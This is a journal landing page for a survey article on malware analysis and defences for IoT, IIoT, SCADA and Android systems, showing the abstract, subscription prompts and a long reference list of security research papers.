Skip to main content

Advertisement

Springer Nature Link
Log in

A Review on Malware Analysis for IoT and Android System

  • Survey Article
  • Published:
SN Computer Science Aims and scope Submit manuscript

Abstract

Today all humankind is willing to avail more facilities and hopes everything should be available with a click of the button. In order to offer different services, the developers have come with inbuilt modules of several systems. This make easy system develoment and services may be offered intantly. These services are connected to the internet and accessible via Android phones and IoT devices. But this inbuilt module suffers from a lot of vulnerabilities, bugs, and default settings which may be difficult to change, as happened at the time of changing the password of home-based Wi-Fi router, which require external applications and OTP verifications, etc. Due to these issues and new hacking tools and techniques, security is a major challenge today. The basic framework to provide adequate security of the system comprises five following principles: integrity, confidentiality, availability, privacy, and nonrepudiation. The attacker may leverage advantage of any shortcomings that may lead to several issues. This work explores the cause of threads/vulnerability particularly for IoT, IIoT, SCADA, and Android application systems. The structure of this work is divided in different sections like, a short introduction to Malware, how it infects the system, and a detailed malware exploitation plan that is generally followed by expert attackers to exploit the vulnerabilities related to critical infrastructure or to defame the organization or countries is presented. In addition, General framework based introduction on IoT and Android is also presented with common vulnerabilities at every stage and respective mitigation strategies. Both static and dynamic analyses are evaluated in this work. It is identified that, for a better model design and evaluation, both are highly recommended for the implementation of effective malware detection strategies. Along with these models in order to protect the infra-structure Honeynet, IDS, IPS, Hardware-based securities like CPU and Memory and forensic analysis are also very effective.

This is a preview of subscription content, log in via an institution to check access.

Access this article

Log in via an institution

Subscribe and save

Springer+ Basic
$34.99 /Month
  • Get 10 units per month
  • Download Article/Chapter or eBook
  • 1 Unit = 1 Article or 1 Chapter
  • Cancel anytime
Subscribe now

Buy Now

Price excludes VAT (USA)
Tax calculation will be finalised during checkout.

Instant access to the full article PDF.

Institutional subscriptions

Fig. 1
Fig. 2
Fig. 3
Fig. 4
Fig. 5
Fig. 6
Fig. 7
Fig. 8
Fig. 9
Fig. 10
Fig. 11
Fig. 12
Fig. 13
Fig. 14

Similar content being viewed by others

Data availability

Data sharing not applicable to this article as no datasets were generated or analysed during the current study.

References

  1. Kim Y, Kim I, Shim CY. A taxonomy for DOS attacks in VANET. In: 2014 14th International Symposium on Communications and Information Technologies (ISCIT), pp. 26–27. 2014.

  2. Fontugne R, Borgnat P, Abry P, Fukuda K. Mawilab: combining diverse anomaly detectors for automated anomaly labeling and performance benchmarking. In: Proceedings of the 6th International Conference, pp. 1–12. 2010.

  3. Ramilli M. Malware training sets: a machine learning dataset for everyone. 2016.

  4. Kent AD. Cyber security data sources for dynamic network research. In: Dynamic Networks and Cyber-Security, World Scientific, pp. 37–65. 2016.

  5. Ma J, Saul LK, Savage S, Voelker GM. Beyond blacklists: learning to detect malicious web sites from suspicious URLs. In: Proceedings of the 15th ACM SIGKDD international conference on Knowledge discovery and data mining, pp. 1245–1254. 2009.

  6. Moustafa N, Slay J. UNSW-NB15: a comprehensive data set for network intrusion detection systems (UNSW-NB15 network data set). In: 2015 military communications and information systems conference (MilCIS), pp. 1–6. 2015.

  7. Turcotte MJM, Kent AD, Hash C. Unified host and network data set. In: Data Science for Cyber-Security, World Scientific, pp. 1–22. 2019.

  8. Hagberg A, Lemons N, Kent A, Neil J. Connected components and credential hopping in authentication graphs. Tenth International Conf Signal Image Technol Based Syst. 2014;2014:416–23.

    Google Scholar 

  9. Garcia S, Grill M, Stiborek J, Zunino A. An empirical comparison of botnet detection methods. Comput Secur. 2014;45:100–23.

    Google Scholar 

  10. Parmisano A, Garcia S, Erquiaga M. Stratosphere laboratory. A labeled dataset with malicious and benign IoT network traffic. 2020.

  11. Anderson HS, Roth P. Ember: an open dataset for training static pe malware machine learning models. 2018. arXiv:1804.04637.

  12. Shaid SZM, Maarof MA. Malware behavior image for malware variant identification. Int Symp Biomet Secur Technol (ISBAST). 2014;2014:238–43.

    Google Scholar 

  13. Weaver R. Visualizing and modeling the scanning behavior of the conficker botnet in the presence of user and network activity. IEEE Trans Inf Foren Secur. 2015;10(5):1039–51.

    Google Scholar 

  14. Massicotte F, Couture M, Normandin H, Letourneau M. Navigating and visualizing the malware intelligence space. IEEE Netw. 2012;26(6):19–25.

    Google Scholar 

  15. Kancherla K, Mukkamala S. Image visualization based malware detection. IEEE Symp Comput Intell Cyber Secur (CICS). 2013;2013:40–4.

    Google Scholar 

  16. Koniaris I, Papadimitriou G, Nicopolitidis P, Obaidat M. Honeypots deployment for the analysis and visualization of malware activity and malicious connections. IEEE Int Conf Commun (ICC). 2014;2014:1819–24.

    Google Scholar 

  17. Donahue J, Paturi A, Mukkamala S. Visualization techniques for efficient malware detection. IEEE Int Conf Intell Secur Inform. 2013;2013:289–91.

    Google Scholar 

  18. Kirat D, Nataraj L, Vigna G, Manjunath BS. Sigmal: a static signal processing based malware triage. In: Proceedings of the 29th Annual Computer Security Applications Conference, pp. 89–98. 2013.

  19. Bai L, Pang J, Zhang Y, Fu W, Zhu J. Detecting malicious behavior using critical api-calling graph matching. First Int Conf Inform Sci Eng. 2009;2009:1716–9.

    Google Scholar 

  20. Blokhin K, Saxe J, Mentis D. Malware similarity identification using call graph based system call subsequence features. In: 2013 IEEE 33rd International Conference on Distributed Computing Systems Workshops, pp. 6–10. 2013.

  21. Cesare S, Xiang Y, Zhou W. Control flow-based malware variantdetection. IEEE Trans Depend Secur Comput. 2013;11(4):307–17.

    Google Scholar 

  22. Cesare S, Xiang Y. Malware variant detection using similarity search over sets of control flow graphs. In: 2011IEEE 10th International Conference on Trust, Security and Privacy in Computing and Communications, pp. 181–189. 2011.

  23. Atici MA, Sagiroglu S, Dogru IA. Android malware analysis approach based on control flow graphs and machine learning algorithms. In: 2016 4th International Symposium on Digital Forensic and Security (ISDFS), pp. 26–31. 2016.

  24. Da Xu L, He W, Li S. Internet of things in industries: a survey. IEEE Trans Ind Inform. 2014;10(4):2233–43. https://doi.org/10.1109/TII.2014.2300753.

    Article  Google Scholar 

  25. Mosenia A, Jha NK. A comprehensive study of security of internet-of-things. IEEE Trans Emerg Top Comput. 2016;5(4):586–602.

    Google Scholar 

  26. Yang Y, Wu L, Yin G, Li L, Zhao H. A survey on security and privacy issues in internet-of-things. IEEE Internet Things J. 2017;4(5):1250–8. https://doi.org/10.1109/JIOT.2017.2694844.

    Article  Google Scholar 

  27. Frustaci M, Pace P, Aloi G, Fortino G. Evaluating critical security issues of the IoT world: present and future challenges. IEEE Internet Things J. 2017;5(4):2483–95.

    Google Scholar 

  28. Alaba FA, Othman M, Hashem IAT, Alotaibi F. Internet of things security: a survey. J Netw Comput Appl. 2017;88:10–28. https://doi.org/10.1016/j.jnca.2017.04.002.

    Article  Google Scholar 

  29. Khan MA, Salah K. IoT security: Review, blockchain solutions, and open challenges. Fut Gen Comput Syst. 2018;82:395–411. https://doi.org/10.1016/j.future.2017.11.022.

    Article  Google Scholar 

  30. Hameed S, Khan FI, Hameed B. Understanding security requirements and challenges in internet of things (IoT): A Review. J Comput Netw Commun. 2019. https://doi.org/10.1155/2019/9629381.

    Article  Google Scholar 

  31. Kouicem DE, Bouabdallah A, Lakhlef H. Internet of things security: a top–down survey. Comput Netw. 2018;141:199–221. https://doi.org/10.1016/j.comnet.2018.03.012.

    Article  Google Scholar 

  32. Riahi Sfar A, Natalizio E, Challal Y, Chtourou Z. A roadmap for security challenges in the Internet of Things. Digit Commun Netw. 2018;4(2):118–37. https://doi.org/10.1016/j.dcan.2017.04.003.

    Article  Google Scholar 

  33. Ziegeldorf JH, Morchon OG, Wehrle K. Privacy in the Internet of Things: threats and challenges. Secur Commun Netw. 2014;7(12):2728–42.

    Google Scholar 

  34. Li C, Palanisamy B. Privacy in internet of things: from principles to technologies. IEEE Internet Things J. 2019;6(1):488–505. https://doi.org/10.1109/JIOT.2018.2864168.

    Article  Google Scholar 

  35. Boyes H, Hallaq B, Cunningham J, Watson T. The industrial internet of things (IIoT): an analysis framework. Comput Ind. 2018;101:1–12. https://doi.org/10.1016/j.compind.2018.04.015.

    Article  Google Scholar 

  36. Oztemel E, Gursev S. Literature review of Industry 4.0 and related technologies. J Intell Manuf. 2020;31(1):127–82. https://doi.org/10.1007/s10845-018-1433-8.

    Article  Google Scholar 

  37. Alcácer V, Cruz-Machado V. Scanning the Industry 4.0: a literature review on technologies for manufacturing systems. Eng Sci Technol Int J. 2019;22(3):899–919. https://doi.org/10.1016/j.jestch.2019.01.006.

    Article  Google Scholar 

  38. Fernández-Caramés TM, Fraga-Lamas P. A review on the use of blockchain for the Internet of Things. IEEE Access. 2018;6:32979–3001.

    Google Scholar 

  39. Atlam HF, Alenezi A, Alassafi MO, Wills G. Blockchain with internet of things: Benefits, challenges, and future directions. Int J Intell Syst Appl. 2018;10(6):40–8.

    Google Scholar 

  40. Reyna A, Martín C, Chen J, Soler E, Díaz M. On blockchain and its integration with IoT. Challenges and opportunities. Fut Gen Comput Syst. 2018;88:173–90. https://doi.org/10.1016/j.future.2018.05.046.

    Article  Google Scholar 

  41. Wang X, et al. Survey on blockchain for Internet of Things. Comput Commun. 2019;136:10–29. https://doi.org/10.1016/j.comcom.2019.01.006.

    Article  Google Scholar 

  42. Wang Q, Zhu X, Ni Y, Gu L, Zhu H. Blockchain for the IoT and industrial IoT: a review. Internet of Things. 2020;10: 100081. https://doi.org/10.1016/j.iot.2019.100081.

    Article  Google Scholar 

  43. Makhdoom I, Abolhasan M, Abbas H, Ni W. Blockchain’s adoption in IoT: the challenges, and a way forward. J Netw Comput Appl. 2019;125:251–79. https://doi.org/10.1016/j.jnca.2018.10.019.

    Article  Google Scholar 

  44. Ferrag MA, Derdour M, Mukherjee M, Derhab A, Maglaras L, Janicke H. Blockchain technologies for the internet of things: research issues and challenges. IEEE Internet Things J. 2018;6(2):2188–204.

    Google Scholar 

  45. Sengupta J, Ruj S, Das Bit S. A comprehensive survey on attacks, security issues and blockchain solutions for IoT and IIoT. J Netw Comput Appl. 2020. https://doi.org/10.1016/j.jnca.2019.102481.

    Article  Google Scholar 

  46. Ahemd MM, Shah MA, Wahid A. IoT security: A layered approach for attacks and defenses. In: 2017 international conference on Communication Technologies (ComTech), pp. 104–110. 2017.

  47. Andrea I, Chrysostomou C, Hadjichristofi G. Internet of Things: security vulnerabilities and challenges. IEEE Sympo Comput Commun (ISCC). 2015;2015:180–7.

    Google Scholar 

  48. Ling Z, Liu K, Xu Y, Jin Y, Fu X. An end-to-end view of IoT security and privacy. In: 2017 IEEE Global Communications Conference, GLOBECOM 2017—Proceedings, Jul. 2017, vol. 2018–January, pp. 1–7. https://doi.org/10.1109/GLOCOM.2017.8254011.

  49. Wurm J, Hoang K, Arias O, Sadeghi AR, Jin Y. Security analysis on consumer and industrial IoT devices. In: Proceedings of the Asia and South Pacific Design Automation Conference, ASP-DAC, Mar. 2016, vol. 25–28-January-2016, pp. 519–524. https://doi.org/10.1109/ASPDAC.2016.7428064.

  50. Zhang N, Mi X, Feng X, Wang X, Tian Y, Qian F. Understanding and mitigating the security risks of voice-controlled third-party skills on amazon alexa and google home. 2018. arXiv:1805.01525.

  51. All IF. The 5 worst examples of Iot hacking and vulnerabilities in recorded history. 2017. https//www.iotforall.com/5-worst-iot-hacking-vulnerabilities.

  52. Gomes T, Salgado F, Tavares A, Cabral J. Cute mote, a customizable and trustable end-device for the internet of things. IEEE Sens J. 2017;17(20):6816–24.

    Google Scholar 

  53. Porambage P, Schmitt C, Kumar P, Gurtov A, Ylianttila M. PAuthKey: a pervasive authentication protocol and key establishment scheme for wireless sensor networks in distributed IoT applications. Int J Distrib Sens Netw. 2014. https://doi.org/10.1155/2014/357430.

    Article  Google Scholar 

  54. Hei X, Du X, Wu J, Hu F. Defending resource depletion attacks on implantable medical devices. 2010. https://doi.org/10.1109/GLOCOM.2010.5685228.

  55. Aman MN, Chua KC, Sikdar B. A Light-weight mutual authentication protocol for IoT systems. In: 2017 IEEE Global Communications Conference, GLOBECOM 2017—Proceedings, Jul. 2017, vol. 2018–January, pp. 1–6. https://doi.org/10.1109/GLOCOM.2017.8253991.

  56. Choi J, Kim Y. An improved LEA block encryption algorithm to prevent side-channel attack in the IoT system. Asia-Pacific Signal Inform Process Assoc Annu Summit Confer (APSIPA). 2016;2016:1–4.

    Google Scholar 

  57. Sicari S, Rizzardi A, Miorandi D, Coen-Porisini A. REATO: REActing TO denial of service attacks in the internet of things. Comput Netw. 2018;137:37–48. https://doi.org/10.1016/j.comnet.2018.03.020.

    Article  Google Scholar 

  58. Andrea I, Chrysostomou C, Hadjichristofi G. Internet of Things: Security vulnerabilities and challenges. In: Proceedings—IEEE Symposium on Computers and Communications, Feb. 2016, vol. 2016–February, pp. 180–187. https://doi.org/10.1109/ISCC.2015.7405513.

  59. Varga P, Plosz S, Soos G, Hegedus C. Security threats and issues in automation IoT. 2017. https://doi.org/10.1109/WFCS.2017.7991968.

  60. Guin U, Singh A, Alam M, Canedo J, Skjellum A. A secure low-cost edge device authentication scheme for the internet of things. In: Proceedings of the IEEE International Conference on VLSI Design, Mar. 2018, vol. 2018–January, pp. 85–90. https://doi.org/10.1109/VLSID.2018.42.

  61. Glissa G, Rachedi A, Meddeb A. A secure routing protocol based on RPL for internet of things. 2016. https://doi.org/10.1109/GLOCOM.2016.7841543.

  62. Pu C, Hajjar S. Mitigating Forwarding misbehaviors in RPL-based low power and lossy networks. In: CCNC 2018—2018 15th IEEE Annual Consumer Communications and Networking Conference, Mar. 2018, vol. 2018–January, pp. 1–6. https://doi.org/10.1109/CCNC.2018.8319164.

  63. Cervantes C, Poplade D, Nogueira M, Santos A. Detection of sinkhole attacks for supporting secure routing on 6LoWPAN for Internet of Things. In: Proceedings of the 2015 IFIP/IEEE International Symposium on Integrated Network Management, IM 2015, Jun. 2015, pp. 606–611. https://doi.org/10.1109/INM.2015.7140344.

  64. Shukla P. ML-IDS: a machine learning approach to detect wormhole attacks in Internet of Things. In: 2017 Intelligent Systems Conference, IntelliSys 2017, Mar. 2018, vol. 2018–January, pp. 234–240. https://doi.org/10.1109/IntelliSys.2017.8324298.

  65. Airehrour D, Gutierrez JA, Ray SK. SecTrust-RPL: a secure trust-aware RPL routing protocol for Internet of Things. Fut Gen Comput Syst. 2019;93:860–76.

    Google Scholar 

  66. Singh M, Rajan MA, Shivraj VL, Balamuralidhar P. Secure MQTT for Internet of Things (IoT). In: Proceedings—2015 5th International Conference on Communication Systems and Network Technologies, CSNT 2015, Sep. 2015, pp. 746–751. https://doi.org/10.1109/CSNT.2015.16.

  67. Park N, Kang N. Mutual authentication scheme in secure internet of things technology for comfortable lifestyle. Sensors. 2016;16(1):20.

    Google Scholar 

  68. Ashibani Y, Mahmoud QH. An efficient and secure scheme for smart home communication using identity-based signcryption. In: 2017 IEEE 36th International Performance Computing and Communications Conference, IPCCC 2017, Feb. 2018, vol. 2018–January, pp. 1–7. https://doi.org/10.1109/PCCC.2017.8280497.

  69. Adat V, Gupta BB. A DDoS attack mitigation framework for internet of things. In: Proceedings of the 2017 IEEE International Conference on Communication and Signal Processing, ICCSP 2017, Feb. 2018, vol. 2018–January, pp. 2036–2041. https://doi.org/10.1109/ICCSP.2017.8286761.

  70. Yin D, Zhang L, Yang K. A DDoS attack detection and mitigation with software-defined internet of things framework. IEEE Access. 2018;6:24694–705. https://doi.org/10.1109/ACCESS.2018.2831284.

    Article  Google Scholar 

  71. Liu C, Cronin P, Yang C. A mutual auditing framework to protect IoT against hardware Trojans. In: Proceedings of the Asia and South Pacific Design Automation Conference, ASP-DAC. 2016; 69–74. https://doi.org/10.1109/ASPDAC.2016.7427991.

  72. Konigsmark STC, Chen D, Wong MDF. Information dispersion for trojan defense through high-level synthesis. In: Proceedings—2Design Automation Conference. 2016;05–09. https://doi.org/10.1145/2897937.2898034.

  73. Naeem H, Guo B, Naeem MR. A light-weight malware static visual analysis for IoT infrastructure. In: 2018 International Conference on Artificial Intelligence and Big Data, ICAIBD 2018. 2018;240–244. https://doi.org/10.1109/ICAIBD.2018.8396202.

  74. Su J, Danilo Vasconcellos V, Prasad S, Daniele S, Feng Y, Sakurai K. Lightweight classification of IoT malware based on image recognition. In: Proceedings—International Computer Software and Applications Conference. 2018;2:664–669. https://doi.org/10.1109/COMPSAC.2018.10315.

  75. Chan M. Why cloud computing is the foundation of the Internet of Things. 2017.

  76. Song T, Li R, Mei B, Yu J, Xing X, Cheng X. A privacy preserving communication protocol for IoT applications in smart homes. IEEE Internet Things J. 2017;4(6):1844–52.

    Google Scholar 

  77. Machado C, Frohlich AA. IoT data integrity verification for cyber-physical systems using blockchain. In: Proceedings - 2018 IEEE 21st International Symposium on Real-Time Computing, ISORC 2018, pp. 83–90. 2018. https://doi.org/10.1109/ISORC.2018.00019.

  78. Rahulamathavan Y, Phan RCW, Rajarajan M, Misra S, Kondoz A. Privacy-preserving blockchain based IoT ecosystem using attribute-based encryption. In: 11th IEEE International Conference on Advanced Networks and Telecommunications Systems, ANTS 2017, pp. 1–6. 2018. https://doi.org/10.1109/ANTS.2017.8384164.

  79. Zheng D, Wu A, Zhang Y, Zhao Q. Efficient and privacy-preserving medical data sharing in internet of things with limited computing power. IEEE Access. 2018;6:28019–27. https://doi.org/10.1109/ACCESS.2018.2840504.

    Article  Google Scholar 

  80. Gope P, Sikdar B. Lightweight and privacy-preserving two-factor authentication scheme for IoT devices. IEEE Internet Things J. 2018;6(1):580–9.

    Google Scholar 

  81. Gai K, Choo KKR, Qiu M, Zhu L. Privacy-preserving content-oriented wireless communication in internet-of-things. IEEE Internet Things J. 2018;5(4):3059–67. https://doi.org/10.1109/JIOT.2018.2830340.

    Article  Google Scholar 

  82. Liu J, Zhang C, Fang Y. EPIC: a differential privacy framework to defend smart homes against internet traffic analysis. IEEE Internet Things J. 2018;5(2):1206–17. https://doi.org/10.1109/JIOT.2018.2799820.

    Article  Google Scholar 

  83. Esfahani A, et al. A lightweight authentication mechanism for M2M communications in industrial IoT environment. IEEE Internet Things J. 2019;6(1):288–96. https://doi.org/10.1109/JIOT.2017.2737630.

    Article  Google Scholar 

  84. Li X, Niu J, Bhuiyan MZA, Wu F, Karuppiah M, Kumari S. A robust ECC-Based provable secure authentication protocol with privacy preserving for industrial internet of things. IEEE Trans Ind Inform. 2018;14(8):3599–609. https://doi.org/10.1109/TII.2017.2773666.

    Article  Google Scholar 

  85. Srinivas J, Das AK, Wazid M, Kumar N. Anonymous lightweight chaotic map-based authenticated key agreement protocol for industrial Internet of Things. IEEE Trans Depend Secur Comput. 2018;17(6):1133–46.

    Google Scholar 

  86. Yan Q, Huang W, Luo X, Gong Q, Yu FR. A multi-level DDoS mitigation framework for the industrial internet of things. IEEE Commun Mag. 2018;56(2):30–6. https://doi.org/10.1109/MCOM.2018.1700621.

    Article  Google Scholar 

  87. Sengupta S, Yasmin G, Ghosal A. Classification of male and female speech using perceptual features. In: 2017 8th International Conference on Computing, Communication and Networking Technologies (ICCCNT), pp. 1–7. 2017.

  88. Sengupta J, Ruj S, Das Bit S. End to end secure anonymous communication for secure directed diffusion in IoT. In: ACM International Conference Proceeding Series, pp. 445–450. 2019. https://doi.org/10.1145/3288599.3295577.

  89. Khanmohammadi K, Ebrahimi N, Hamou-Lhadj A, Khoury R. Empirical study of android repackaged applications. Empir Softw Eng. 2019;24(6):3587–629. https://doi.org/10.1007/s10664-019-09760-3.

    Article  Google Scholar 

  90. Google. “Google Play”. 2020. https://play.google.com/store/apps?hl=fr.

  91. Arp D, Spreitzenbarth M, Hubner M, Gascon H, Rieck K, Siemens C. Drebin: effective and explainable detection of android malware in your pocket. Ndss. 2014;14:23–6.

    Google Scholar 

  92. Zhou Y, Jiang X. Dissecting android malware: characterization and evolution. In: Proceedings—IEEE Symposium on Security and Privacy, pp. 95–109, 2012. https://doi.org/10.1109/SP.2012.16.

  93. Allix K, Bissyandé TF, Klein J, Le Traon Y. AndroZoo: collecting millions of Android apps for the research community. In: Proceedings—13th Working Conference on Mining Software Repositories, MSR 2016, pp. 468–471. 2016. https://doi.org/10.1145/2901739.2903508.

  94. Parkour M. Contagio mobile. 2008.

  95. VirusShare. VirusShare.com—because sharing is caring. 2011.

  96. Suarez-Tangil G, Dash SK, Ahmadi M, Kinder J, Giacinto G, Cavallaro L. DroidSieve: fast and accurate classification of obfuscated android malware. In: CODASPY 2017—Proceedings of the 7th ACM Conference on Data and Application Security and Privacy, pp. 309–320. 2017. https://doi.org/10.1145/3029806.3029825.

  97. Zangief. AppChina is the best Android app store alternative. 2014.

  98. Maiorca D, Ariu D, Corona I, Aresu M, Giacinto G. Stealth attacks: an extended insight into the obfuscation effects on Android malware. Comput Secur. 2015;51:16–31. https://doi.org/10.1016/j.cose.2015.02.007.

    Article  Google Scholar 

  99. Zangief. Gfan provides you free Android apps and games. 2017. http://appcakefans.com/gfan-provides-you-free-android-apps-and-games/.

  100. Chen T, Mao Q, Yang Y, Lv M, Zhu J. TinyDroid: A lightweight and efficient model for android malware detection and classification. Mob Inf Syst. 2018;2018. https://doi.org/10.1155/2018/4157156.

  101. Chen J, Alalfi MH, Dean TR, Zou Y. Detecting android malware using clone detection. J Comput Sci Technol. 2015;30(5):942–56. https://doi.org/10.1007/s11390-015-1573-7.

    Article  Google Scholar 

  102. Potharaju R, Newell A, Nita-Rotaru C, Zhang X. Plagiarizing smartphone applications: attack strategies and defense techniques. In: International symposium on engineering secure software and systems, pp 106–120. 2012.

  103. Liu P, Wang W, Luo X, Wang H, Liu C. NSDroid: efficient multi-classification of android malware using neighborhood signature in local function call graphs. Int J Inf Secur. 2021;20(1):59–71. https://doi.org/10.1007/s10207-020-00489-5.

    Article  Google Scholar 

  104. Wang W, Gao Z, Zhao M, Li Y, Liu J, Zhang X. DroidEnsemble: detecting Android malicious applications with ensemble of string and structural static features. IEEE Access. 2018;6:31798–807.

    Google Scholar 

  105. Zhou W, Zhou Y, Jiang X, Ning P. Detecting repackaged smartphone applications in third-party android marketplaces. 2012;317. https://doi.org/10.1145/2133601.2133640.

  106. Qiao M, Sung AH, Liu Q. Merging permission and api features for android malware detection. In: Proceedings - 2016 5th IIAI International Congress on Advanced Applied Informatics, IIAI-AAI 2016. 2016; 566–571. https://doi.org/10.1109/IIAI-AAI.2016.237.

  107. Wu DJ, Mao CH, Wei TE, Lee HM, Wu KP. DroidMat: android malware detection through manifest and API calls tracing. In: Proceedings of the 2012 7th Asia Joint Conference on Information Security, AsiaJCIS 2012. 2012;62–69. https://doi.org/10.1109/AsiaJCIS.2012.18.

  108. Sarma B, Li N, Gates C, Potharaju R, Nita-Rotaru C, Molloy I. Android permissions: a perspective combining risks and benefits. In: Proceedings of ACM Symposium on Access Control Models and Technologies, SACMAT. 2012;13–22. https://doi.org/10.1145/2295136.2295141.

  109. Peng H, et al. Using probabilistic generative models for ranking risks of Android apps. In: Proceedings of the ACM Conference on Computer and Communications Security, pp. 241–252. 2012. https://doi.org/10.1145/2382196.2382224.

  110. Enck W, Ongtang M, McDaniel P. On lightweight mobile phone application certification. In: Proceedings of the ACM Conference on Computer and Communications Security, pp. 235–245. 2009. https://doi.org/10.1145/1653662.1653691.

  111. Aafer Y, Du W, Yin H. Droidapiminer: Mining api-level features for robust malware detection in android. In: International conference on security and privacy in communication systems, pp. 86–103. 2013.

  112. Zhou Y, Wang Z, Zhou W, Jiang X. Hey, you, get off of my market: detecting malicious apps in official and alternative android markets. NDSS. 2012;25(4):50–2.

    Google Scholar 

  113. Millar S, McLaughlin N, Martinez del Rincon J, Miller P. Multi-view deep learning for zero-day Android malware detection. J Inf Secur Appl. 2021;58. https://doi.org/10.1016/j.jisa.2020.102718.

  114. Xiao X, Zhang S, Mercaldo F, Hu G, Sangaiah AK. Android malware detection based on system call sequences and LSTM. Multimed Tools Appl. 2019;78(4):3979–99. https://doi.org/10.1007/s11042-017-5104-0.

    Article  Google Scholar 

  115. Chaba S, Kumar R, Pant R, Dave M. Malware detection approach for android systems using system call logs. 2017.

  116. Canfora G, Mercaldo F, Medvet E, Visaggio CA. Detecting android malware using sequences of system calls. In: 3rd International Workshop on Software Development Lifecycle for Mobile, DeMobile 2015—Proceedings. 2015;13–20. https://doi.org/10.1145/2804345.2804349.

  117. Burguera I, Zurutuza U, Nadjm-Tehrani S. Crowdroid: behavior-based malware detection system for android. In Proceedings of the ACM Conference on Computer and Communications Security, pp. 15–25, 2011. https://doi.org/10.1145/2046614.2046619.

  118. Feng P, Ma J, Sun C, Xu X, Ma Y. A novel dynamic android malware detection system with ensemble learning. IEEE Access. 2018;6:30996–1011. https://doi.org/10.1109/ACCESS.2018.2844349.

    Article  Google Scholar 

  119. Shabtai A, Kanonov U, Elovici Y, Glezer C, Weiss Y. ‘Andromaly’: a behavioral malware detection framework for android devices. J Intell Inf Syst. 2012;38(1):161–90. https://doi.org/10.1007/s10844-010-0148-x.

    Article  Google Scholar 

  120. Xie N, Zeng F, Qin X, Zhang Y, Zhou M, Lv C. RepassDroid: automatic detection of android malware based on essential permissions and semantic features of sensitive APIs. In: Proceedings—2018 12th International Symposium on Theoretical Aspects of Software Engineering, TASE 2018, Dec. 2018, vol. 2018–January, pp. 52–59. https://doi.org/10.1109/TASE.2018.00015.

  121. Wen L, Yu H. An Android malware detection system based on machine learning. AIP Conf Proceed. 2017;1864. https://doi.org/10.1063/1.4992953.

  122. Bugiel S, Davi L, Dmitrienko A, Fischer T, Sadeghi A-R. Xmandroid: a new android evolution to mitigate privilege escalation attacks. Tech Univ Darmstadt Tech Rep TR-2011–04. 2011.

  123. Bakour K, Ünver HM (2021) DeepVisDroid: android malware detection by hybridizing image-based features with deep learning techniques. Neural Comput Appl. 2021;1–18.

  124. Falcone Y, Currea S, Jaber M (2013) Runtime verification and enforcement for android applications with RV-droid. In: Lecture Notes in Computer Science (including subseries Lecture Notes in Artificial Intelligence and Lecture Notes in Bioinformatics), vol. 7687 LNCS, pp. 88–95. 2013. https://doi.org/10.1007/978-3-642-35632-2_11.

  125. Portokalidis G, Homburg P, Anagnostakis K, Bos H. Paranoid android: versatile protection for smartphones. In: Proceedings—Annual Computer Security Applications Conference, ACSAC, pp. 347–356. 2010. https://doi.org/10.1145/1920261.1920313.

  126. Lee WY, Saxe J, Harang R. SeqDroid: obfuscated android malware detection using stacked convolutional and recurrent neural networks. In: Deep Learning Applications for Cyber Security, Springer, pp. 197–210. 2019.

  127. Phu TN, Hoang LH, Toan NN, Tho ND, Binh NN. CFDVex: a novel feature extraction method for detecting cross-architecture IoT Malware. In: Proceedings of the Tenth International Symposium on Information and Communication Technology, pp. 248–254. 2019.

  128. Islam R, Tian R, Batten LM, Versteeg S. Classification of malware based on integrated static and dynamic features. J Netw Comput Appl. 2013;36(2):646–56. https://doi.org/10.1016/j.jnca.2012.10.004.

    Article  Google Scholar 

  129. Shahzad F, Farooq M. ELF-Miner: using structural knowledge and data mining methods to detect new (Linux) malicious executables. Knowl Inf Syst. 2012;30(3):589–612. https://doi.org/10.1007/s10115-011-0393-5.

    Article  Google Scholar 

  130. Bai J, Yang Y, Mu S, Ma Y. Malware detection through mining symbol table of linux executables. Inf Technol J. 2013;12(2):380–4. https://doi.org/10.3923/itj.2013.380.384.

    Article  Google Scholar 

  131. HaddadPajouh H, Dehghantanha A, Khayami R, Choo KKR. A deep recurrent neural network based approach for internet of things malware threat hunting. Fut Gen Comput Syst. 2018;85:88–96. https://doi.org/10.1016/j.future.2018.03.007.

    Article  Google Scholar 

  132. Dovom EM, Azmoodeh A, Dehghantanha A, Newton DE, Parizi RM, Karimipour H. Fuzzy pattern tree for edge malware detection and categorization in IoT. J Syst Archit. 2019;97:1–7.

    Google Scholar 

  133. Darabian H, Dehghantanha A, Hashemi S, Homayoun S, Choo KR. An opcode-based technique for polymorphic Internet of Things malware detection. Concurr Comput Pract Exp. 2020;32(6): e5173.

    Google Scholar 

  134. Alhanahnah M, Lin Q, Yan Q, Zhang N, Chen Z. Efficient signature generation for classifying cross-architecture IoT malware. 2018. https://doi.org/10.1109/CNS.2018.8433203.

  135. Alasmary H, Anwar A, Park J, Choi J, Nyang D, Mohaisen A. Graph-based comparison of IoT and android malware. In: International Conference on Computational Social Networks, pp. 259–272. 2018.

  136. Alasmary H, et al. Analyzing and detecting emerging internet of things malware: a graph-based approach. IEEE Internet Things J. 2019;6(5):8977–88. https://doi.org/10.1109/JIOT.2019.2925929.

    Article  Google Scholar 

  137. Azmoodeh A, Dehghantanha A, Choo K-KR. Robust malware detection for internet of (battlefield) things devices using deep eigenspace learning. IEEE Trans Sustain Comput. 2018;4(1):88–95.

    Google Scholar 

  138. Nguyen H-T, Ngo Q-D, Le V-H. A novel graph-based approach for IoT botnet detection. Int J Inf Secur. 2020;19(5):567–77.

    Google Scholar 

  139. Ngo QD, Nguyen HT, Le VH, Nguyen DH. A survey of IoT malware and detection methods based on static features. ICT Express, vol. 6, no. 4. Korean Institute of Communication Sciences, pp. 280–286. 2020. https://doi.org/10.1016/j.icte.2020.04.005.

  140. Sikorski M, Honig A. Practical malware analysis: the hands-on guide to dissecting malicious software. No starch press. 2012.

  141. Wang T-Y, Wu C-H. Detection of packed executables using support vector machines. In: 2011 International Conference on Machine Learning and Cybernetics. 2011;2:717–722.

  142. Abimannan S, Kumaravelu R. A mathematical model of HMST model on malware static analysis. Int J Inf Secur Priv. 2019;13(2):86–103.

    Google Scholar 

  143. Abdessadki I, Lazaar S. New classification based model for malicious PE files detection. Int J Comput Netw Inf Secur. 2019; 11(6).

  144. Ligh MH, Adair S, Hartsteini B, Richard M. Malware analyst’s cookbook and DVD. Wiley Publishing. 2011.

  145. Liao X, Yuan K, Wang X, Li Z, Xing L, Beyah R. Acing the ioc game: toward automatic discovery and analysis of open-source cyber threat intelligence. In: Proceedings of the 2016 ACM SIGSAC Conference on Computer and Communications Security, pp. 755–766. 2016.

  146. Schrittwieser S, Katzenbeisser S. Code obfuscation against static and dynamic reverse engineering. In: International workshop on information hiding, pp. 270–284. 2011.

